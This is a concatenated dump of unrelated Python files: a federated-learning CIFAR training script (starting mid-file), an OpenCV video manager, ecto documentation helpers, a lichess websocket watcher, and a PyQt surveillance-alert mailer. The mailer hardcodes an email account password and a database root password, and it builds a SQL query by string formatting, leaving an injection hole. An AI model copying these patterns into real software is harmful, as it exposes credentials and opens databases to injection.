layers.MaxPooling2D(pool_size=(2, 2))(layer2) layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer3) layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer4) layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5) layer7 = layers.Flatten()(layer6) layer8 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer7) classification = layers.Dense(n_outputs, activation="linear")(layer8) else: # VGG 3 BLOCK layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( inputs) layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer1) layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2) layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer3) layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer4) layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5) layer7 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer6) layer8 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer7) layer9 = layers.MaxPooling2D(pool_size=(2, 2))(layer8) layer10 = layers.Flatten()(layer9) layer11 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer10) classification = layers.Dense(n_outputs, activation="linear")(layer11) # Convolutions # layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs) # layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1) # layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2) # # layer4 = layers.Flatten()(layer3) # # layer5 = layers.Dense(512, activation="relu")(layer4) # classification = layers.Dense(n_outputs, activation="linear")(layer5) return keras.Model(inputs=inputs, outputs=classification) def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1): model_global = create_q_model() model_parameters_initial = np.asarray(model_global.get_weights()) parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round) global_target_model = 'results/model_global.npy' np.save(global_target_model, model_parameters_initial) pause(5) # wait for neighbors while True: pause(refresh_server) # refresh global model on every xx seconds np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch=0, aggregation_type=0)) fileList = glob.glob('*.mat', recursive=False) if len(fileList) == devices: # stop the server break # execute for each deployed device def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution): pause(5) # PS server (if any) starts first checkpointpath1 = 'results/model{}.h5'.format(device_index) outfile = 'results/dump_train_variables{}.npz'.format(device_index) outfile_models = 'results/dump_train_model{}.npy'.format(device_index) global_model = 'results/model_global.npy' np.random.seed(1) tf.random.set_seed(1) # common initialization learning_rate = args.mu learning_rate_local = learning_rate B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices) Probabilities = B[device_index, :]/(devices - 1) training_signal = False # check for backup variables on start if os.path.isfile(checkpointpath1): train_start = False # backup the model and the model target model = models.load_model(checkpointpath1) data_history = [] label_history = [] local_model_parameters = np.load(outfile_models, allow_pickle=True) model.set_weights(local_model_parameters.tolist()) dump_vars = np.load(outfile, allow_pickle=True) frame_count = dump_vars['frame_count'] epoch_loss_history = dump_vars['epoch_loss_history'].tolist() running_loss = np.mean(epoch_loss_history[-5:]) epoch_count = dump_vars['epoch_count'] else: train_start = True model = create_q_model() data_history = [] label_history = [] frame_count = 0 # Experience replay buffers epoch_loss_history = [] epoch_count = 0 running_loss = math.inf training_end = False # create a data object (here radar data) if args.noniid_assignment == 0: data_handle = CIFARData(device_index, start_samples, samples, full_data_size, args.random_data_distribution) else: data_handle = CIFARData_task(device_index, start_samples, samples, full_data_size, args.random_data_distribution) # create a consensus object cfa_consensus = CFA_process(devices, device_index, args.N) while True: # Run until solved # collect 1 batch frame_count += 1 obs, labels = data_handle.getTrainingData(batch_size) data_batch = preprocess_observation(obs, batch_size) # Save data and labels in the current learning session data_history.append(data_batch) label_history.append(labels) # Local learning update every "number of batches" batches if frame_count % number_of_batches == 0 and not training_signal: epoch_count += 1 for i in range(number_of_batches): data_sample = np.array(data_history[i]) label_sample = np.array(label_history[i]) # Create a mask to calculate loss masks = tf.one_hot(label_sample, n_outputs) with tf.GradientTape() as tape: # Train the model on data samples classes = model(data_sample) # Apply the masks class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1) # Calculate loss loss = loss_function(label_sample, class_v) # Backpropagation grads = tape.gradient(loss, model.trainable_variables) optimizer.apply_gradients(zip(grads, model.trainable_variables)) del data_history del label_history data_history = [] label_history = [] model_weights = np.asarray(model.get_weights()) model.save(checkpointpath1, include_optimizer=True, save_format='h5') np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history, training_end=training_end, epoch_count=epoch_count, loss=running_loss) np.save(outfile_models, model_weights) # Consensus round # update local model cfa_consensus.update_local_model(model_weights) # neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor # neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor neighbor = np.random.choice(np.arange(devices), args.N, replace=False) # choose neighbor while neighbor == device_index: neighbor = np.random.choice(np.arange(devices), args.N, replace=False) if not train_start: if federated and not training_signal: eps_c = 1 / (args.N + 1) # apply consensus for model parameter print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index, loss.numpy())) model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, frame_count, eps_c, max_lag)) if cfa_consensus.getTrainingStatusFromNeightbor(): # a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model) training_signal = True # stop local learning, just do validation else: print("Warm up") train_start = False # check if parameter server is enabled stop_aggregation = False if parameter_server: pause(refresh_server) while not os.path.isfile(global_model): # implementing consensus print("waiting") pause(1) try: model_global = np.load(global_model, allow_pickle=True) except: pause(5) print("retrying opening global model") try: model_global = np.load(global_model, allow_pickle=True) except: print("halting aggregation") stop_aggregation = True if not stop_aggregation: # print("updating from global model inside the parmeter server") for k in range(cfa_consensus.layers): # model_weights[k] = model_weights[k]+ 0.5*(model_global[k]-model_weights[k]) model_weights[k] = model_global[k] model.set_weights(model_weights.tolist()) del model_weights # validation tool for device 'device_index' if epoch_count > validation_start and frame_count % number_of_batches == 0: avg_cost = 0. for i in range(number_of_batches_for_validation): obs_valid, labels_valid = data_handle.getTestData(batch_size, i) # obs_valid, labels_valid = data_handle.getRandomTestData(batch_size) data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size) data_sample = np.array(data_valid) label_sample = np.array(labels_valid) # Create a mask to calculate loss masks = tf.one_hot(label_sample, n_outputs) classes = model(data_sample) # Apply the masks class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1) # Calculate loss loss = loss_function(label_sample, class_v) avg_cost += loss / number_of_batches_for_validation # Training loss epoch_loss_history.append(avg_cost) print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count, avg_cost)) # mean loss for last 5 epochs running_loss = np.mean(epoch_loss_history[-5:]) if running_loss < target_loss or training_signal: # Condition to consider the task solved print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss)) training_end = True model_weights = np.asarray(model.get_weights()) model.save(checkpointpath1, include_optimizer=True, save_format='h5') # model_target.save(checkpointpath2, include_optimizer=True, save_format='h5') np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history, training_end=training_end, epoch_count=epoch_count, loss=running_loss) np.save(outfile_models, model_weights) if federated: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "neighbors": args.N, "active_devices": args.Ka_consensus, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} elif parameter_server: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "active_devices": active_devices_per_round, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} else: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} if federated: sio.savemat( "results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format( device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1) elif parameter_server: sio.savemat( "results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1) else: # CL sio.savemat( "results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( samples, devices, number_of_batches, batch_size,args.noniid_assignment, args.run, args.random_data_distribution), dict_1) break if epoch_count > max_epochs: # stop simulation print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count)) training_end = True model_weights = np.asarray(model.get_weights()) model.save(checkpointpath1, include_optimizer=True, save_format='h5') # model_target.save(checkpointpath2, include_optimizer=True, save_format='h5') np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history, training_end=training_end, epoch_count=epoch_count, loss=running_loss) np.save(outfile_models, model_weights) if federated: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "neighbors": args.N, "active_devices": args.Ka_consensus, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} elif parameter_server: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "active_devices": active_devices_per_round, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} else: dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated, "parameter_server": parameter_server, "devices": devices, "batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution} if federated: sio.savemat( "results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format( device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1) elif parameter_server: sio.savemat( "results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) sio.savemat( "FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format( device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1) else: # CL sio.savemat( "results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format( samples, devices, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1) break if __name__ == "__main__": # GPU memory growth limitation gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: try: # Currently, memory growth needs to be the same across GPUs for gpu in gpus: tf.config.experimental.set_memory_growth(gpu, True) logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs") except RuntimeError as e: # Memory growth must be set before GPUs have been initialized print(e) if args.resume == 0: # clear all files # DELETE TEMPORARY CACHE FILES fileList = glob.glob('results/*.npy', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") fileList = glob.glob('results/*.h5', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") fileList = glob.glob('results/*.npz', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") fileList = glob.glob('*.mat', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") # main loop for multiprocessing t = [] ############# enable consensus based federation ####################### # federated = False # federated = True ######################################################## ##################### enable parameter server ############## # parameter_server = False server_index = devices # parameter_server = True ######################################################### samples = np.zeros(devices) # training samples per device for id in range(devices): # samples[id]=math.floor(w[id]*validation_train) # samples[id] = math.floor(balancing_vect[id]*fraction_training) samples[id] = training_set_per_device # samples = int(fraction_training/devices) # training samples per device ######################### Create a non-iid assignment ########################## # if args.noniid_assignment == 1: # total_training_size = training_set_per_device * devices # samples = get_noniid_data(total_training_size, devices, batch_size) # while np.min(samples) < batch_size: # samples = get_noniid_data(total_training_size, devices, batch_size) ############################################################################# print(samples) #################################### code testing CL learning (0: data center) # federated = False # parameter_server = False # processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server) ###################################################################################### if federated or parameter_server: for ii in range(devices): # position start if ii == 0: start_index = 0 else: start_index = start_index + int(samples[ii-1]) t = threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)) t.start() # last process is for the target server if parameter_server: print("Target server starting with active devices {}".format(active_devices_per_round)) t = threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated, refresh_server)) t.start() else: # run centralized learning on device 0 (data center) processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples) exit(0)
Management.py
# MIT License # Copyright (c) 2019 Fernando Perez import numpy as np import time import cv2 try: from PIL import Image except ModuleNotFoundError as e: pass try: # It is usefull if you want to detect scene changes import imagehash except ModuleNotFoundError as e: pass try: # It is usefull if you want to track objects import dlib except ModuleNotFoundError as e: pass from queue import Queue from threading import Thread class ManagerCV2(): """ ManagerCV2 helps to manage videos and streams With this Class you are capable to iterate a video frame by frame (if you want, you can also limit the FPS). Also you can add keystrokes with your own callbacks methods in a easiest way. At the same time you can ask to this manager the index of the current frame (self.count_frames) and the FPS processing average. Finally you can set a method to execute when finishing the iteration. """ _tries_reconnect_stream = 10 class KeystrokeManager(): """ KeystrokeManager helps to manage all keystroke during the for of the manager With this Class ManagerCV2 is capable to manage easily each keystroke. """ def __init__(self, **kwargs): """ KeystrokeManager constructor. Have in mind that with this class you will never get an error when you ask for an attribute that doesn't exist. It will create with the value: False Thats cool because su can pass no params to this constructor, and then when you need to chek if a keystroke was pressed (you really check the param, not the keystroke itself), if it was never pressed the param doesn't exist, but we take care of it for you :) Keyword arguments: Each keyword argument that you pass to the constructor will be an attribute for this object. """ self.__dict__.update(kwargs) def __getattr__ (self, attr): """ getattr Have in mind that this method is called each time that you try to get an attribute that doesn't exist. We manage it creating this attribute an giving a value of False. This is because we want to inform that the asociated with this parameter wasen't pressed yet. """ self.__dict__[attr] = False return False def execute_management(self, *args): """ execute_management Each time a relevant key is pressed, it will set the associated param to True. So you can manage it and decide what to do in each case. """ for arg in args: value = getattr(self, arg) setattr(self, arg, not value) def __init__(self, video, is_stream=False, fps_limit=0, queue_size=256, detect_scenes=False, show_video=False): """ ManagerCV2 constructor. Arguments: video -- cv2.VideoCapture that it is going to manage Keyword arguments: is_stream -- Bool to indicate if it is an stream or not. It is not necessary to set it to True if you are using an stream. It is only for managing streams issuess. On a stream it is possible to lose frames, so, if you set is_stream to True, it will try to reconnect the stream as many times as `ManagerCV2._tries_reconnect_stream` indicates. (Default: False) fps_limit -- You can set with it the maximum FPS of the video. If you set it to 0, it means no limit. (Default: 0) queue_size -- The maximum number of frames to store in the queue (for multiprocessing). (Default: 256) detect_scenes -- Bool to indicate if you want to detect changes of scenes, it will have an small impact on the frame rate. Almost 0 if it is a video and you set fps_limit < 60. (Default: False) show_video -- Bool to indicate if you want to show the video (with cv2.imshow). If you use the method `add_keystroke` you don't need to use this param (its fine if you still want to put it to True). Also, if you doesn't want to show the video, let it a False. (Default: False) """ # Video/Stream managment attributes self.video = video self.is_stream = is_stream self.stream = video self.fps_limit = fps_limit self.show_video = show_video self.queue_size = queue_size self.stream_error = False self.stopped = False self.queue = None self.queue_thread = None self.awake_thread = None # Keystrokes attributes self.key_manager = ManagerCV2.KeystrokeManager() self.last_keystroke = -1 self.__keystroke_dict = { # The first three elements will have allways the same length 'keystroke':[], 'wait_key':[], 'keystroke_args':[], 'exit_keystrokes':[], } self.ret_handler = None self.ret_handler_args = () self.ret_handler_kwargs = {} # Additional features self.initial_time = None self.final_time = None self.count_frames = 0 # Scene detection self.detect_scenes = detect_scenes self.new_scene = False self.previous_frame_hash = None self.hash_distance = 25 # Tracking algorithm self.selector_tracker = None self.trackers = [] def __iter__(self): self.initial_time = time.time() self.last_frame_time = self.initial_time self.final_time = self.initial_time self.count_frames = 0 self.last_keystroke = -1 # All queue management self.stopped = False self.queue = Queue(maxsize=self.queue_size) self.queue_awake = Queue(maxsize=1) self.queue_thread = Thread(target=self.fill_queue, args=()) self.queue_thread.daemon = True self.queue_thread.start() return self def __next__(self): # Get frame from queue if not stopped yet if self.stopped and self.queue.qsize() == 0: self.end_iteration() frame, frame_hash = self.queue.get(block=True) # This is how it comunicates with the thread (to indicate it takes something) if not self.queue_awake.full(): self.queue_awake.put(None) # If we get a frame but it is None, it means that we finished the queue if frame is None: self.end_iteration() # If we must detect scenes it will help us if self.detect_scenes: if not self.previous_frame_hash: self.new_scene = True else: self.new_scene = (frame_hash - self.previous_frame_hash > self.hash_distance) self.previous_frame_hash = frame_hash self.final_time = time.time() self.count_frames += 1 # If they press one of the keystrokes, it will raise the method for i, wait_key in enumerate(self.__keystroke_dict['wait_key']): self.last_keystroke = cv2.waitKey(wait_key) if self.last_keystroke in self.__keystroke_dict['keystroke']: index = self.__keystroke_dict['keystroke'].index(self.last_keystroke) self.key_manager.execute_management(*self.__keystroke_dict['keystroke_args'][index]) if self.last_keystroke in self.__keystroke_dict['exit_keystrokes']: self.end_iteration() # If we doesn't add a keystroke we should at least wait a minimum in order to # be capable to reproduce the video with cv2.imshow (if you indicated that you want # tho display the video) # Also, you can wait by yourself (without using Management) if self.show_video and not self.__keystroke_dict['wait_key']: cv2.waitKey(1) # Here we limit the speed (if we want constant frames) if self.fps_limit: time_to_sleep = (1 / self.fps_limit) - (time.time() - self.last_frame_time) if time_to_sleep > 0: time.sleep(time_to_sleep) self.last_frame_time = time.time() return frame def fill_queue(self): # keep looping infinitely while True: # If the thread indicator variable is set, stop the thread if self.stopped: return if not self.queue.full(): ret, frame = self.video.read() # In case of streaming it means that we could lose some frames # so this variable is usefull to check it self.stream_error = bool(ret) # If it is a streaming we will try to reconnect if self.is_stream and not ret: exit = False for i in range(ManagerCV2._tries_reconnect_stream): ret, frame = self.video.read() if ret: break if i+1 == ManagerCV2._tries_reconnect_stream: self.stop_queue() return elif not ret: self.stop_queue() return frame_hash = None if self.detect_scenes: frame_hash = imagehash.dhash(Image.fromarray(frame)) self.queue.put((frame,frame_hash)) queue_size = self.queue.qsize() else: # I want to wait until someone awake me self.queue_awake.get() def stop_queue(self): self.stopped = True self.queue.put((None,None)) def set_tracking(self, selector, frame): self.selector_tracker = selector self.trackers = [] rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) height, width, _ = rgb_frame.shape for selection in self.selector_tracker.zones: if self.selector_tracker.normalized: selection = (int(selection[0]*width), int(selection[1]*height), int(selection[2]*width), int(selection[3]*height)) tracker = dlib.correlation_tracker() tracker.start_track(rgb_frame, dlib.rectangle(*selection)) self.trackers.append(tracker) def get_tracking(self, frame): rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) height, width, _ = rgb_frame.shape for i, tracker in enumerate(self.trackers): tracker.update(rgb_frame) pos = tracker.get_position() selection = (int(pos.left()),int(pos.top()), int(pos.right()), int(pos.bottom())) if self.selector_tracker.normalized: selection = (selection[0]/width, selection[1]/height, selection[2]/width, selection[3]/height) self.selector_tracker.zones[i] = selection return self.selector_tracker def set_ret_handler(self, method, *args, **kwargs): """ Method to execute when finished Video/Stream Arguments: method -- Method to execute args -- Arguments to pass to the method kwargs -- Keyword argoments to pass to the method """ self.ret_handler = method self.ret_handler_args = args self.ret_handler_kwargs = kwargs def add_keystroke(self, keystroke, wait_key, *args, exit=False): """ Method to execute when pressed a key Arguments: keystroke -- Key to check if pressed waitkey -- Ms to wait key (it works exactly as cv2.waitKey) args -- Arguments to pass to the method """ self.__keystroke_dict['keystroke'].append(keystroke) self.__keystroke_dict['wait_key'].append(wait_key) self.__keystroke_dict['keystroke_args'].append(args) if exit: self.__keystroke_dict['exit_keystrokes'].append(keystroke) def get_last_keystroke(self): """ Check the last pressed keystroke (not neccesarily in the last frame)""" return self.last_keystroke def end_iteration(self): """ Internal method to finish iteration, with the previous configuration""" self.stopped = True self.video.release() if self.ret_handler: self.ret_handler(*self.ret_handler_args, **self.ret_handler_kwargs) raise StopIteration def get_fps(self): """ Get average FPS""" return round(self.count_frames / (self.final_time - self.initial_time),3) def is_error_last_frame(self): """ If we lose the last frame it will return True eoc False (only usefull for streams)""" return self.stream_error
doc.py
# # Copyright (c) 2011, Willow Garage, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the Willow Garage, Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ''' Created on Mar 12, 2011 @author: ethan.rublee@gmail.com (Ethan Rublee) ''' import ecto import sys import inspect from pydoc import ispackage from inspect import ismodule import multiprocessing def print_tendrils(tendril, n): for x in tendril : #print "here" value = str(x.data().get()) print(" - " + x.key() + " [%s]" % x.data().type_name + " default = %s" % value) print("") docstr = str(x.data().doc) doclines = docstr.splitlines() if doclines : for docline in doclines: print(" " + docline) print("") def print_module_doc(m): print(m.__doc__) def list_all_cells(pymodule): ''' Creates a list of all cells from a python module, which are ready for doc string and other types of introspection. ''' l = [] for x in dir(pymodule): mod = getattr(pymodule, x) if inspect.isclass(mod) and getattr(mod, '__looks_like_a_cell__', False): l.append(mod) return l list_all_ecto_modules = list_all_cells def list_cells(pymodule): l = [] for x in dir(pymodule): mod = getattr(pymodule, x) if inspect.isclass(mod) and getattr(mod, '__looks_like_a_cell__', False): l.append(mod) return l list_ecto_module = list_cells def view_plasm(plasm, title=None): process = multiprocessing.Process(target=ecto.impl.view_plasm, args=(plasm,title)) process.daemon = True process.start()
worker.py
import Queue import threading import websocket import json import time from django.utils import timezone from datetime import timedelta def _run_worker(): while True: _, fn, args = _work_queue.get() try: fn(*args) except: pass _work_queue = Queue.PriorityQueue() _worker_thread = threading.Thread(target=_run_worker) _worker_thread.daemon = True _worker_thread.start() def queue_work(priority, fn, *args): _work_queue.put((-priority, fn, args)) def _run_socket(): global _websocket last_start = None fallback = 2 while True: try: if last_start is not None and last_start > timezone.now() - timedelta(seconds=10): time.sleep(fallback) fallback = fallback * 2 if fallback > 120: fallback = 120 else: fallback = 2 last_start = timezone.now() _websocket = websocket.create_connection('wss://socket.lichess.org/api/socket') with _games_lock: for game_id in _games.keys(): _start_watching(game_id) while True: msg = json.loads(_websocket.recv()) if msg['t'] == 'fen': with _games_lock: game_id = msg['d']['id'] if game_id in _games: _games[game_id] = msg except: continue def _start_watching(game_id): try: _websocket.send(json.dumps({'t': 'startWatching', 'd': game_id})) except: pass _websocket = None _games = {} _games_lock = threading.Lock() _socket_thread = threading.Thread(target=_run_socket) _socket_thread.daemon = True _socket_thread.start() def watch_games(game_ids): with _games_lock: game_id_set = set(game_ids) for game_id in set(_games.keys()) - game_id_set: del _games[game_id] for game_id in game_id_set - set(_games.keys()): _games[game_id] = None _start_watching(game_id) return [_games[game_id] for game_id in game_ids] def add_watch(game_id): with _games_lock: if game_id not in _games: _games[game_id] = None _start_watching(game_id)
Alert_Area2.py
# -*- coding: utf-8 -*- from PyQt5 import QtCore, QtGui, QtWidgets import pygame import pymysql from PyQt5.QtCore import QTimer import time import smtplib import os from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.mime.application import MIMEApplication import multiprocessing import datetime class Ui_Alert2(object): update = 1 count = 0 tw = time.time() flag = False def __init__(self, num): self.num = num self.timer = QTimer() # set timer timeout callback function self.timer.timeout.connect(self.viewcam) # set control_bt callback clicked function def viewcam(self): t1 = time.time() print('###############',self.num) if t1 - self.tw >= self.update: self.count += 1 con = self.num - self.count self.btn_sndmail.setText('Send Mail ' + str(con)) print(con) if con == 0: print('Send Mail') self.count = 0 self.btn_sndmail.setText('Send') self.timer.stop() P1 = multiprocessing.Process(target=self.send_mail) P1.start() self.tw = time.time() def controlTimer(self): # if timer is stopped if not self.timer.isActive(): self.timer.start(20) def stop_(self): self.btn_sndmail.setText('Send Mail') self.timer.stop() def send_mail(self): connection = pymysql.connect("localhost", "root", "rootpass", "project") cursor = connection.cursor() cursor.execute("select count(*) from inform") row = cursor.fetchone() total_row = int(row[0]) print('total row', total_row) name = 'Name : '+self.lineEdit_name.text()+', ' age = 'Age : '+self.lineEdit_age.text()+', ' gender = 'Gender : '+self.lineEdit_gender.text()+', ' citizen = ' Nationality : '+self.lineEdit_nationality.text()+', ' other = 'OtherInfo : '+self.lineEdit_other.text() table = '\n'+name+'\n'+age+'\n'+gender+'\n'+citizen+'\n'+other cursor.execute("SELECT * FROM inform") rw = cursor.fetchone() for i in range(total_row): email = 'faizk2651@gmail.com' password = '9892338308' send_to_email = rw[2] subject = 'ALERT!' address = 'Goregaon(W),Patkar College' message = rw[1] + ' this is an autogenerated mail to alert you, a suspicious person is detected on Date/Time ' + self.curr_dt + ' at Address: ' + address + '. Suspect Information : ' + table files = [self.enrolled_img,self.lastmatch_img] msg = MIMEMultipart() msg['To'] = send_to_email msg['From'] = email msg['Subject'] = subject body = MIMEText(message, 'html', 'utf-8') msg.attach(body) # add message body (text or html) for f in files: # add files to the message attachment = MIMEApplication(open(f, "rb").read(), _subtype="txt") attachment.add_header('Content-Disposition', 'attachment', filename=f) msg.attach(attachment) server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(send_to_email, password) text = msg.as_string() server.sendmail(send_to_email, send_to_email, text) print(str(i),' ',rw[1]) rw = cursor.fetchone() server.quit() def display_profile(self,f_name,f_name2): self.curr_dt = str(datetime.datetime.now()) connnection = pymysql.connect("localhost","root","rootpass","project") cursor = connnection.cursor() select_query = "select * from blockacess where fname ='%s'" %(f_name) cursor.execute(select_query) row = cursor.fetchone() self.lineEdit_id.setText(str(row[0])) self.lineEdit_name.setText(row[1]) self.lineEdit_age.setText(row[3]) self.lineEdit_gender.setText(row[4]) self.lineEdit_nationality.setText(row[5]) self.lineEdit_other.setText(row[6]) self.lineEdit_datetime.setText(self.curr_dt) #self.lineEdit_date.setText(curdate()) #self.lineEdit_time.setText(curtime()) self.enrolled_img = 'Registered/' + f_name + '.jpg' self.lastmatch_img = 'Monitor/Registered/'+f_name+'/' + f_name2 pixmap = QtGui.QPixmap('Registered/' + f_name + '.jpg') pixmap = pixmap.scaled(self.label_img1.width(), self.label_img1.height(), QtCore.Qt.KeepAspectRatio) self.label_img1.setPixmap(pixmap) self.label_img1.setAlignment(QtCore.Qt.AlignCenter) pixmap = QtGui.QPixmap('Monitor/Registered/'+f_name+'/' + f_name2) pixmap = pixmap.scaled(self.label_img2.width(), self.label_img2.height(), QtCore.Qt.KeepAspectRatio) 